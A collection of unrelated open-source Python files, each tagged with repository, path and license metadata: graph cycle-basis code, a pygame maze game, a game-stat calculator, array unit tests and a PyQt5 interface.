explored.update(seen)
else:
assert len(cycle) == 0
raise nx.exception.NetworkXNoCycle("No cycle found.")
# We now have a list of edges which ends on a cycle.
# So we need to remove from the beginning edges that are not relevant.
for i, edge in enumerate(cycle):
tail, head = tailhead(edge)
if tail == final_node:
break
return cycle[i:]
@not_implemented_for("directed")
@not_implemented_for("multigraph")
def minimum_cycle_basis(G, weight=None):
""" Returns a minimum weight cycle basis for G
Minimum weight means a cycle basis for which the total weight
(length for unweighted graphs) of all the cycles is minimum.
Parameters
----------
G : NetworkX Graph
weight: string
name of the edge attribute to use for edge weights
Returns
-------
A list of cycle lists. Each cycle list is a list of nodes
which forms a cycle (loop) in G. Note that the nodes are not
necessarily returned in a order by which they appear in the cycle
Examples
--------
>>> G=nx.Graph()
>>> nx.add_cycle(G, [0,1,2,3])
>>> nx.add_cycle(G, [0,3,4,5])
>>> print([sorted(c) for c in nx.minimum_cycle_basis(G)])
[[0, 1, 2, 3], [0, 3, 4, 5]]
References:
[1] Kavitha, Telikepalli, et al. "An O(m^2n) Algorithm for
Minimum Cycle Basis of Graphs."
http://link.springer.com/article/10.1007/s00453-007-9064-z
[2] de Pina, J. 1995. Applications of shortest path methods.
Ph.D. thesis, University of Amsterdam, Netherlands
See Also
--------
simple_cycles, cycle_basis
"""
# We first split the graph in commected subgraphs
return sum(
(_min_cycle_basis(G.subgraph(c), weight) for c in nx.connected_components(G)),
[],
)
def _min_cycle_basis(comp, weight):
cb = []
# We extract the edges not in a spanning tree. We do not really need a
# *minimum* spanning tree. That is why we call the next function with
# weight=None. Depending on implementation, it may be faster as well
spanning_tree_edges = list(nx.minimum_spanning_edges(comp, weight=None, data=False))
edges_excl = [frozenset(e) for e in comp.edges() if e not in spanning_tree_edges]
N = len(edges_excl)
# We maintain a set of vectors orthogonal to sofar found cycles
set_orth = [{edge} for edge in edges_excl]
for k in range(N):
# kth cycle is "parallel" to kth vector in set_orth
new_cycle = _min_cycle(comp, set_orth[k], weight=weight)
cb.append(list(set().union(*new_cycle)))
# now update set_orth so that k+1,k+2... th elements are
# orthogonal to the newly found cycle, as per [p. 336, 1]
base = set_orth[k]
set_orth[k + 1 :] = [
orth ^ base if len(orth & new_cycle) % 2 else orth
for orth in set_orth[k + 1 :]
]
return cb
def _min_cycle(G, orth, weight=None):
"""
Computes the minimum weight cycle in G,
orthogonal to the vector orth as per [p. 338, 1]
"""
T = nx.Graph()
nodes_idx = {node: idx for idx, node in enumerate(G.nodes())}
idx_nodes = {idx: node for node, idx in nodes_idx.items()}
nnodes = len(nodes_idx)
# Add 2 copies of each edge in G to T. If edge is in orth, add cross edge;
# otherwise in-plane edge
for u, v, data in G.edges(data=True):
uidx, vidx = nodes_idx[u], nodes_idx[v]
edge_w = data.get(weight, 1)
if frozenset((u, v)) in orth:
T.add_edges_from(
[(uidx, nnodes + vidx), (nnodes + uidx, vidx)], weight=edge_w
)
else:
T.add_edges_from(
[(uidx, vidx), (nnodes + uidx, nnodes + vidx)], weight=edge_w
)
all_shortest_pathlens = dict(nx.shortest_path_length(T, weight=weight))
cross_paths_w_lens = {
n: all_shortest_pathlens[n][nnodes + n] for n in range(nnodes)
}
# Now compute shortest paths in T, which translates to cyles in G
start = min(cross_paths_w_lens, key=cross_paths_w_lens.get)
end = nnodes + start
min_path = nx.shortest_path(T, source=start, target=end, weight="weight")
# Now we obtain the actual path, re-map nodes in T to those in G
min_path_nodes = [node if node < nnodes else node - nnodes for node in min_path]
# Now remove the edges that occur two times
mcycle_pruned = _path_to_cycle(min_path_nodes)
return {frozenset((idx_nodes[u], idx_nodes[v])) for u, v in mcycle_pruned}
def _path_to_cycle(path):
"""
Removes the edges from path that occur even number of times.
Returns a set of edges
"""
edges = set()
for edge in pairwise(path):
# Toggle whether to keep the current edge.
edges ^= {edge}
return edges
|
SpaceGroupUCL/qgisSpaceSyntaxToolkit
|
esstoolkit/external/networkx/algorithms/cycles.py
|
Python
|
gpl-3.0
| 21,635
|
import pygame
from pygame.locals import *
from basic_objects import MovingObject, Map
class App:
def __init__(self):
self._maze = None
self._moving_thing = None
self._running = True
self._image_black = None
self._image_white = None
self._image_mthing = None
self._image_final = None
def on_init(self):
pygame.init()
self._maze = Map(10, 10)
self._maze.recursive_division_maze_generation(1, 10, 1, 10)
self._moving_thing = MovingObject(self._maze)
self._display_surf = pygame.display.set_mode((1000, 700), pygame.HWSURFACE)
self._running = True
self._image_black = pygame.image.load("images/black.jpg").convert()
self._image_white = pygame.image.load("images/white.jpg").convert()
self._image_mthing = pygame.image.load("images/mthing.jpg").convert()
self._image_final = pygame.image.load("images/final.jpg").convert()
def on_event(self, event):
if event.type == pygame.QUIT:
self._running = False
elif event.type == pygame.KEYDOWN:
if event.key == pygame.K_s:
self.on_key_down(event)
elif event.key == pygame.K_w:
self.on_key_up(event)
elif event.key == pygame.K_a:
self.on_key_left(event)
elif event.key == pygame.K_d:
self.on_key_right(event)
def on_key_down(self, event):
self._moving_thing.move_down()
def on_key_up(self, event):
self._moving_thing.move_up()
def on_key_left(self, event):
self._moving_thing.move_left()
def on_key_right(self, event):
self._moving_thing.move_right()
def on_render(self):
length = self._maze.length
width = self._maze.width
moving_thing = self._moving_thing
for y in range(1, length + 1):
for x in range(1, width + 1):
if abs(moving_thing.x - x) < 2 and abs(moving_thing.y - y) < 2:
if moving_thing.maze[x, y] == 0:
self._display_surf.blit(self._image_white,(x * 30,y * 30))
pygame.display.flip()
elif moving_thing.maze[x, y] == 1:
self._display_surf.blit(self._image_black,(x * 30,y * 30))
pygame.display.flip()
elif moving_thing.maze[x, y] == 2:
self._display_surf.blit(self._image_mthing,(x * 30,y * 30))
pygame.display.flip()
elif moving_thing.maze[x, y] == 3:
self._display_surf.blit(self._image_final,(x * 30,y * 30))
pygame.display.flip()
elif moving_thing.maze[x, y] == 3:
self._display_surf.blit(self._image_final,(x * 30,y * 30))
pygame.display.flip()
else:
self._display_surf.blit(self._image_black,(x * 30,y * 30))
pygame.display.flip()
def on_cleanup(self):
pygame.quit()
def on_execute(self):
if self.on_init() == False:
self._running = False
while( self._running ):
for event in pygame.event.get():
self.on_event(event)
self.on_render()
if self._moving_thing.maze[self._moving_thing.x, self._moving_thing.y] == 3:
self._running = False
self.on_cleanup()
if __name__ == "__main__" :
theApp = App()
theApp.on_execute()
|
antonionikolov/blind-labyrinth
|
gui.py
|
Python
|
gpl-3.0
| 3,611
|
from collections import OrderedDict
from WowItem import Item
import math
class Character:
def __init__(self):
# base stats are taken from a lvl 70 character
# or look those stats up from wowwiki
self._baseStats = OrderedDict([
("mana", 0),
("spellcrit", 0),
("intellect", 0),
("spirit", 0),
("intToSpellcrit", 0), # intellect needed for 1% spell crit
("spellcritRatingToSpellcrit", 22.08) # spell crit rating needed for 1% spell crit
])
self._itemStats = Item() # stats gained from items
self._gemStats = Item() # stats gained from gems
self._enchantStats = Item() # stats gained from enchants
self._totalStats = Item()
self._totalStats.ItemStatDict().update({"mana": 0}) # adding mana as stat
def UpdateTotalStat(self, key):
if key not in self._itemStats.ItemStatDict() or \
key not in self._totalStats.ItemStatDict():
print "'", key, "' not in Character (Character.UpdateTotalStat)"
return
# not all stats are base stats
if key not in self._baseStats:
self._totalStats.Set(key, \
self._itemStats.Get(key) + \
self._gemStats.Get(key) + \
self._enchantStats.Get(key) \
)
else:
self._totalStats.Set(key, \
self._baseStats[key] + \
self._itemStats.Get(key) + \
self._gemStats.Get(key) + \
self._enchantStats.Get(key) \
)
def UpdateTotalStats(self):
for key in self._itemStats.ItemStatDict():
# note that itemStats, gemStats, enchantStats should be updated at this point
# itemStats holds stats of all items plus potentially activated socket boni
# gemStats holds stats coming purely from gems
# enchantStats holds stats coming purely from enchants
# and since all of the above are 'Item's, we are skipping name, slot and id since those are non-stat fields
if key == "name" or key == "slot" or key == "id" or key == "s_bonus":
continue
self.UpdateTotalStat(key)
self.UpdateTotalMana()
self.UpdateTotalSpellCrit()
def UpdateTotalMana(self):
# should update intellect before calling this
key = "mana"
self._totalStats.Set(key, \
self._baseStats[key] + \
(20 + (15 * (self._totalStats.Get("intellect") - 20))) \
)
def UpdateTotalSpellCrit(self):
if self._baseStats["intToSpellcrit"] == 0:
print "intToSpellcrit has to be non-zero (Character.UpdateTotalSpellCrit)"
# should update intellect before calling this
self._totalStats.Set("spellcrit",
(self._totalStats.Get("intellect") / self._baseStats["intToSpellcrit"]) + \
self._baseStats["spellcrit"] + \
(self._totalStats.Get("spellcritRating") / self._baseStats["spellcritRatingToSpellcrit"]) \
)
'''# TODO might need to add _totalStatsGems
print self._gemStats.Get("spellcrit")
self._gemStats.Set("spellcrit",
(self._gemStats.Get("intellect") / self._baseStats["intToSpellcrit"]) + \
(self._gemStats.Get("spellcritRating") / self._baseStats["spellcritRatingToSpellcrit"]) \
)
print self._gemStats.Get("spellcrit")
'''
#--------------------------------------------------------------------------
# getter and setter
def Get(self, key):
if key not in self._baseStats:
print "'", key, "' not in Character (Character.Get)"
return
return self._baseStats[key]
def Set(self, key, value):
if key not in self._baseStats:
print "'", key, "' not in Character (Character.Set)"
return
self._baseStats[key] = value
def SetItemStats(self, stats):
self._itemStats = stats
def SetGemStats(self, stats):
self._gemStats = stats
def SetEnchantStats(self, stats):
self._enchantStats = stats
#--------------------------------------------------------------------------
# following functions break down some data, interesting for some classes
def ManaFromInt(self):
return (20 + (15 * (self._totalStats.Get("intellect") - 20)))
def SpellCritFromInt(self):
return (self._totalStats.Get("intellect") / self._baseStats["intToSpellcrit"])
|
nessz/tbc_theory-crafter
|
ClassSpecs/StandardCharacter.py
|
Python
|
gpl-3.0
| 4,156
|
# -*- coding: utf-8 -*-
import os
def cls():
os.system('cls' if os.name == 'nt' else 'clear')
cls()
nome = raw_input('Digite seu nome: ')
print 'Olá %s' % nome
|
fcomaciel/python
|
exercicio2.2.py
|
Python
|
gpl-3.0
| 169
|
#
# TestConstants.py
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
from bson.objectid import ObjectId
user = ObjectId('221299887766554433221100')
username = "Test Username"
email = "test.email@unittest.local"
password = "_Test%Password_"
|
octronic-uk/python-web-apis
|
octronic/webapis/user/test/TestConstants.py
|
Python
|
gpl-3.0
| 843
|
"""Unit tests for the mmap backed array class.
Tests are a modified version of the pypy array unit tests."""
import sys
import py
from pytest import raises
class BaseArrayTests:
def test_ctor_basic(self):
assert len(self.array('B')) == 0
assert len(self.array('i')) == 0
raises(TypeError, self.array, 'hi')
raises(TypeError, self.array, 1)
raises(ValueError, self.array, 'q')
a = self.array('B')
assert len(a) == 0
raises(TypeError, a.append, b'h')
assert len(a) == 0
raises(TypeError, a.append, 'hi')
assert len(a) == 0
a.append(7)
assert a[0] == 7
assert type(a[0]) is int
assert len(a) == 1
a = self.array('u')
raises(TypeError, a.append, 7)
raises(TypeError, a.append, b'hi')
a.append('h')
assert a[0] == 'h'
assert type(a[0]) is str
assert len(a) == 1
def test_ctor(self):
a = self.array('B', (1, 2, 3))
assert a[0] == 1
assert a[1] == 2
assert a[2] == 3
assert len(a) == 3
b = self.array('B', a)
assert len(b) == 3
assert a == b
raises(TypeError, self.array, 'i', a)
a = self.array('i', (1, 2, 3))
b = self.array('h', (1, 2, 3))
assert a == b
def test_ctor_typecodes(self):
for tc in 'bhilBHILfd':
assert self.array(tc).typecode == tc
raises(TypeError, self.array, tc, None)
def test_value_range(self):
import sys
values = (-129, 128, -128, 127, 0, 255, -1, 256,
-32768, 32767, -32769, 32768, 65535, 65536,
-2147483647, -2147483648, 2147483647, 4294967295, 4294967296,
)
for bb in (8, 16, 32, 64, 128, 256, 512, 1024):
for b in (bb - 1, bb, bb + 1):
values += (2 ** b, 2 ** b + 1, 2 ** b - 1,
-2 ** b, -2 ** b + 1, -2 ** b - 1)
for tc, ok, pt in (('b', ( -128, 34, 127), int),
('B', ( 0, 23, 255), int),
('h', (-32768, 30535, 32767), int),
('H', ( 0, 56783, 65535), int),
('i', (-32768, 30535, 32767), int),
('I', ( 0, 56783, 65535), int),
('l', (-2 ** 32 // 2, 34, 2 ** 32 // 2 - 1), int),
('L', (0, 3523532, 2 ** 32 - 1), int),
):
a = self.array(tc, ok)
assert len(a) == len(ok)
for v in ok:
a.append(v)
for i, v in enumerate(ok * 2):
assert a[i] == v
assert type(a[i]) is pt or (
# A special case: we return ints in Array('I') on 64-bits,
# whereas CPython returns longs. The difference is
# probably acceptable.
tc == 'I' and
sys.maxint > 2147483647 and type(a[i]) is int)
for v in ok:
a[1] = v
assert a[0] == ok[0]
assert a[1] == v
assert a[2] == ok[2]
assert len(a) == 2 * len(ok)
for v in values:
try:
a[1] = v
assert a[0] == ok[0]
assert a[1] == v
assert a[2] == ok[2]
except OverflowError:
pass
for tc in 'BHIL':
a = self.array(tc)
vals = [0, 2 ** a.itemsize - 1]
a.fromlist(vals)
assert a.tolist() == vals
a = self.array(tc.lower())
vals = [-1 * (2 ** a.itemsize) // 2, (2 ** a.itemsize) // 2 - 1]
a.fromlist(vals)
assert a.tolist() == vals
def test_float(self):
values = [0, 1, 2.5, -4.25]
for tc in 'fd':
a = self.array(tc, values)
assert len(a) == len(values)
for i, v in enumerate(values):
assert a[i] == v
assert type(a[i]) is float
a[1] = 10.125
assert a[0] == 0
assert a[1] == 10.125
assert a[2] == 2.5
assert len(a) == len(values)
def test_itemsize(self):
for t in 'cbB':
assert(self.array(t).itemsize >= 1)
for t in 'uhHiI':
assert(self.array(t).itemsize >= 2)
for t in 'lLf':
assert(self.array(t).itemsize >= 4)
for t in 'd':
assert(self.array(t).itemsize >= 8)
inttypes = 'bhil'
for t in inttypes:
a = self.array(t, [1, 2, 3])
b = a.itemsize
for v in (-2 ** (8 * b) // 2, 2 ** (8 * b) // 2 - 1):
print(type(v))
a[1] = v
assert a[0] == 1 and a[1] == v and a[2] == 3
raises(OverflowError, a.append, -2 ** (8 * b) // 2 - 1)
raises(OverflowError, a.append, 2 ** (8 * b) // 2)
a = self.array(t.upper(), [1, 2, 3])
b = a.itemsize
for v in (0, 2 ** (8 * b) - 1):
a[1] = v
assert a[0] == 1 and a[1] == v and a[2] == 3
raises(OverflowError, a.append, -1)
raises(OverflowError, a.append, 2 ** (8 * b))
def test_frombytes(self):
a = self.array('c')
a.frombytes(b'Hi!')
assert a[0] == b'H' and a[1] == b'i' and a[2] == b'!' and len(a) == 3
for t in 'bBhHiIlLfd':
a = self.array(t)
a.frombytes(b'\x00' * a.itemsize * 2)
assert len(a) == 2 and a[0] == 0 and a[1] == 0
if a.itemsize > 1:
raises(ValueError, a.frombytes, b'\x00' * (a.itemsize - 1))
raises(ValueError, a.frombytes, b'\x00' * (a.itemsize + 1))
raises(ValueError, a.frombytes, b'\x00' * (2 * a.itemsize - 1))
raises(ValueError, a.frombytes, b'\x00' * (2 * a.itemsize + 1))
b = self.array(t, b'\x00' * a.itemsize * 2)
assert len(b) == 2 and b[0] == 0 and b[1] == 0
def test_fromfile(self):
def myfile(c, s):
f = open(self.tempfile, 'wb')
f.write(c * s)
f.close()
return open(self.tempfile, 'rb')
f = myfile(b'\x00', 100)
for t in 'bBhHiIlLfd':
a = self.array(t)
a.fromfile(f, 2)
assert len(a) == 2 and a[0] == 0 and a[1] == 0
a = self.array('b')
a.fromfile(myfile(b'\x01', 20), 2)
assert len(a) == 2 and a[0] == 1 and a[1] == 1
a = self.array('h')
a.fromfile(myfile(b'\x01', 20), 2)
assert len(a) == 2 and a[0] == 257 and a[1] == 257
for i in (0, 1):
a = self.array('h')
raises(EOFError, a.fromfile, myfile(b'\x01', 2 + i), 2)
assert len(a) == 1 and a[0] == 257
def test_fromlist(self):
a = self.array('b')
raises(OverflowError, a.fromlist, [1, 2, 400])
assert len(a) == 0
raises(OverflowError, a.extend, [1, 2, 400])
assert len(a) == 2 and a[0] == 1 and a[1] == 2
raises(OverflowError, self.array, 'b', [1, 2, 400])
a = self.array('b', [1, 2])
assert len(a) == 2 and a[0] == 1 and a[1] == 2
a = self.array('b')
raises(TypeError, a.fromlist, (1, 2, 400))
raises(OverflowError, a.extend, (1, 2, 400))
assert len(a) == 2 and a[0] == 1 and a[1] == 2
raises(TypeError, a.extend, self.array('i', (7, 8)))
assert len(a) == 2 and a[0] == 1 and a[1] == 2
def gen():
for i in range(4):
yield i + 10
a = self.array('i', gen())
assert len(a) == 4 and a[2] == 12
raises(OverflowError, self.array, 'b', (1, 2, 400))
a = self.array('b', (1, 2))
assert len(a) == 2 and a[0] == 1 and a[1] == 2
a.extend(a)
assert repr(a) == "array('b', [1, 2, 1, 2])"
def test_fromstring(self):
raises(ValueError, self.array('i').fromstring, 'hi')
a = self.array('u')
a.fromstring('hi')
assert len(a) == 2 and a[0] == 'h' and a[1] == 'i'
b = self.array('u', 'hi')
assert len(b) == 2 and b[0] == 'h' and b[1] == 'i'
def test_type(self):
for t in 'bBhHiIlLfdcu':
assert type(self.array(t)) is self.array
assert isinstance(self.array(t), self.array)
def test_sequence(self):
a = self.array('i', [1, 2, 3, 4])
assert len(a) == 4
assert a[0] == 1 and a[1] == 2 and a[2] == 3 and a[3] == 4
assert a[-4] == 1 and a[-3] == 2 and a[-2] == 3 and a[-1] == 4
a[-2] = 5
assert a[0] == 1 and a[1] == 2 and a[2] == 5 and a[3] == 4
for i in (4, -5):
raises(IndexError, a.__getitem__, i)
b = a[0:2]
assert len(b) == 2 and b[0] == 1 and b[1] == 2
b[0] = 6
assert len(b) == 2 and b[0] == 6 and b[1] == 2
assert a[0] == 1 and a[1] == 2 and a[2] == 5 and a[3] == 4
assert a.itemsize == b.itemsize
b = a[0:100]
assert len(b) == 4
assert b[0] == 1 and b[1] == 2 and b[2] == 5 and b[3] == 4
l1 = [2 * i + 1 for i in range(10)]
a1 = self.array('i', l1)
for start in range(10):
for stop in range(start, 10):
for step in range(1, 10):
l2 = l1[start:stop:step]
a2 = a1[start:stop:step]
assert len(l2) == len(a2)
for i in range(len(l2)):
assert l2[i] == a2[i]
a = self.array('i', [1, 2, 3, 4])
a[1:3] = self.array('i', [5, 6])
assert len(a) == 4
assert a[0] == 1 and a[1] == 5 and a[2] == 6 and a[3] == 4
a[0:-1:2] = self.array('i', [7, 8])
assert a[0] == 7 and a[1] == 5 and a[2] == 8 and a[3] == 4
raises(ValueError, "a[1:2:4] = self.array('i', [5, 6, 7])")
raises(TypeError, "a[1:3] = self.array('I', [5, 6])")
raises(TypeError, "a[1:3] = [5, 6]")
a = self.array('i', [1, 2, 3])
assert a.__getslice__(1, 2) == a[1:2]
a.__setslice__(1, 2, self.array('i', (7,)))
assert a[0] == 1 and a[1] == 7 and a[2] == 3
def test_list_methods(self):
assert repr(self.array('i')) == "array('i')"
assert repr(self.array('i', [1, 2, 3])) == "array('i', [1, 2, 3])"
assert repr(self.array('h')) == "array('h')"
a = self.array('i', [1, 2, 3, 1, 2, 1])
assert a.count(1) == 3
assert a.count(2) == 2
assert a.index(3) == 2
assert a.index(2) == 1
raises(ValueError, a.index, 10)
a.reverse()
assert repr(a) == "array('i', [1, 2, 1, 3, 2, 1])"
b = self.array('i', [1, 2, 3, 1, 2])
b.reverse()
assert repr(b) == "array('i', [2, 1, 3, 2, 1])"
a.remove(3)
assert repr(a) == "array('i', [1, 2, 1, 2, 1])"
a.remove(1)
assert repr(a) == "array('i', [2, 1, 2, 1])"
a.pop()
assert repr(a) == "array('i', [2, 1, 2])"
a.pop(1)
assert repr(a) == "array('i', [2, 2])"
a.pop(-2)
assert repr(a) == "array('i', [2])"
a.insert(1, 7)
assert repr(a) == "array('i', [2, 7])"
a.insert(0, 8)
a.insert(-1, 9)
assert repr(a) == "array('i', [8, 2, 9, 7])"
a.insert(100, 10)
assert repr(a) == "array('i', [8, 2, 9, 7, 10])"
a.insert(-100, 20)
assert repr(a) == "array('i', [20, 8, 2, 9, 7, 10])"
def test_pop_indexes(self):
a = self.array('i', [1, 2, 3, 1, 1])
# Can't pop item that's not in the array
with raises(IndexError):
a.pop(100)
# Can only pop item that's at most the negative length of the array
with raises(IndexError):
a.pop(-6)
def test_compare(self):
for v1, v2, tt in (([1, 2, 3], [1, 3, 2], 'bhilBHIL'),
(b'abc', b'acb', 'c'),
('abc', 'acb', 'u')):
for t in tt:
a = self.array(t, v1)
b = self.array(t, v1)
c = self.array(t, v2)
assert (a == 7) is False
assert (a == a) is True
assert (a == b) is True
assert (b == a) is True
assert (a == c) is False
assert (c == a) is False
assert (a != a) is False
assert (a != b) is False
assert (b != a) is False
assert (a != c) is True
assert (c != a) is True
assert (a < a) is False
assert (a < b) is False
assert (b < a) is False
assert (a < c) is True
assert (c < a) is False
assert (a > a) is False
assert (a > b) is False
assert (b > a) is False
assert (a > c) is False
assert (c > a) is True
assert (a <= a) is True
assert (a <= b) is True
assert (b <= a) is True
assert (a <= c) is True
assert (c <= a) is False
assert (a >= a) is True
assert (a >= b) is True
assert (b >= a) is True
assert (a >= c) is False
assert (c >= a) is True
def test_copy(self):
a = self.array('i', [1, 2, 3])
from copy import copy
b = copy(a)
a[1] = 7
assert repr(b) == "array('i', [1, 2, 3])"
def test_byteswap(self):
for tc in 'bhilBHIL':
a = self.array(tc, [1, 2, 3])
a.byteswap()
assert len(a) == 3
assert a[0] == 1 * (256 ** (a.itemsize - 1))
assert a[1] == 2 * (256 ** (a.itemsize - 1))
assert a[2] == 3 * (256 ** (a.itemsize - 1))
a.byteswap()
assert len(a) == 3
assert a[0] == 1
assert a[1] == 2
assert a[2] == 3
def test_addmul(self):
a = self.array('i', [1, 2, 3])
assert repr(a + a) == "array('i', [1, 2, 3, 1, 2, 3])"
assert 2 * a == a + a
assert a * 2 == a + a
b = self.array('i', [4, 5, 6, 7])
assert repr(a + b) == "array('i', [1, 2, 3, 4, 5, 6, 7])"
assert repr(2 * self.array('i')) == "array('i')"
assert repr(self.array('i') + self.array('i')) == "array('i')"
a = self.array('i', [1, 2])
assert type(a + a) is self.array
assert type(a * 2) is self.array
assert type(2 * a) is self.array
b = a
a += a
assert repr(b) == "array('i', [1, 2, 1, 2])"
b *= 3
assert repr(a) == "array('i', [1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2])"
assert a == b
a += self.array('i', (7,))
assert repr(a) == "array('i', [1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 7])"
raises(OverflowError, "a * self.maxint")
raises(OverflowError, "a *= self.maxint")
raises(TypeError, "a = self.array('i') + 2")
raises(TypeError, "self.array('i') + self.array('b')")
a = self.array('i')
raises(TypeError, "a += 7")
# Calling __add__ directly raises TypeError in cpython but
# returns NotImplemented in pypy if placed within a
# try: except TypeError: construction.
#
#raises(TypeError, self.array('i').__add__, (2,))
#raises(TypeError, self.array('i').__iadd__, (2,))
#raises(TypeError, self.array('i').__add__, self.array('b'))
class addable(object):
def __add__(self, other):
return b"add"
def __radd__(self, other):
return b"radd"
assert addable() + self.array('i') == b'add'
assert self.array('i') + addable() == b'radd'
a = self.array('i')
a += addable()
assert a == b'radd'
a = self.array('i', [1, 2])
assert a * -1 == self.array('i')
b = a
a *= -1
assert a == self.array('i')
assert b == self.array('i')
a = self.array('i')
raises(TypeError, "a * 'hi'")
raises(TypeError, "'hi' * a")
raises(TypeError, "a *= 'hi'")
class mulable(object):
def __mul__(self, other):
return b"mul"
def __rmul__(self, other):
return b"rmul"
assert mulable() * self.array('i') == b'mul'
assert self.array('i') * mulable() == b'rmul'
a = self.array('i')
a *= mulable()
assert a == b'rmul'
def test_to_various_type(self):
"""Tests for methods that convert to other types"""
a = self.array('i', [1, 2, 3])
l = a.tolist()
assert type(l) is list and len(l) == 3
assert a[0] == 1 and a[1] == 2 and a[2] == 3
b = self.array('i', a.tobytes())
assert len(b) == 3 and b[0] == 1 and b[1] == 2 and b[2] == 3
#assert self.array('c', ('h', 'i')).tobytes() == b'hi' #TODO: must implement array of type 'c' for this
a = self.array('i', [0, 0, 0])
assert a.tobytes() == b'\x00' * 3 * a.itemsize
s = self.array('i', [1, 2, 3]).tobytes()
assert b'\x00' in s
assert b'\x01' in s
assert b'\x02' in s
assert b'\x03' in s
a = self.array('i', s)
assert a[0] == 1 and a[1] == 2 and a[2] == 3
from struct import unpack
values = (-129, 128, -128, 127, 0, 255, -1, 256, -32760, 32760)
s = self.array('i', values).tobytes()
fmt = 'i' * len(values)
a = unpack(fmt, s)
assert a == values
for tcodes, values in (('bhilfd', (-128, 127, 0, 1, 7, -10)),
('BHILfd', (127, 0, 1, 7, 255, 169)),
('hilHILfd', (32760, 30123, 3422, 23244))):
for tc in tcodes:
values += ((2 ** self.array(tc).itemsize) // 2 - 1, )
s = self.array(tc, values).tobytes()
a = unpack(tc * len(values), s)
assert a == values
raises(ValueError, self.array('i').tounicode)
assert self.array('u', 'hello').tounicode() == 'hello'
class TestArray(BaseArrayTests):
def setup_class(cls):
import mmap_backed_array
cls.array = mmap_backed_array.mmaparray
import struct
cls.struct = struct
cls.tempfile = str(py.test.ensuretemp('mmaparray').join('tmpfile'))
cls.maxint = sys.maxsize #get the biggest addressable size
|
JaggedVerge/mmap_backed_array
|
mmap_backed_array/tests/test_array.py
|
Python
|
gpl-3.0
| 18,864
|
# -*- coding: utf-8 -*-
__author__ = 'Xabier Fernandez Gutierrez'
__copyright__ = 'Copyright (C) 2017,Xabier Fernandez Gutierrez'
__credits__ = 'Xabier Fernandez Gutierrez'
__license__ = 'GNU GPL v3.0 '
__version__ = '2017.01'
__maintainer__ = 'Xabier Fernandez Gutierrez'
__email__ = 'xabier.fernandez@outlook.com'
# Form implementation generated from reading ui file 'Mainwindow.ui'
#
# Created by: PyQt5 UI code generator 5.8.2
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
from modules import xml_file, ModFile, TargetFile
from modules import MyMessages
class Ui_MainWindow(object):
def setupUi (self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.setFixedSize(730, 467)
MainWindow.setMaximumSize(MainWindow.size())
MainWindow.setStyleSheet("background-color: rgb(129, 124, 129);")
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.frame = QtWidgets.QFrame(self.centralwidget)
self.frame.setGeometry(QtCore.QRect(20, 20, 391, 421))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 182, 65))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 207))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 172))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 69))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 92))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 182, 65))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 182, 65))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 196))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 182, 65))
brush.setStyle(QtCore.Qt.SolidPattern)
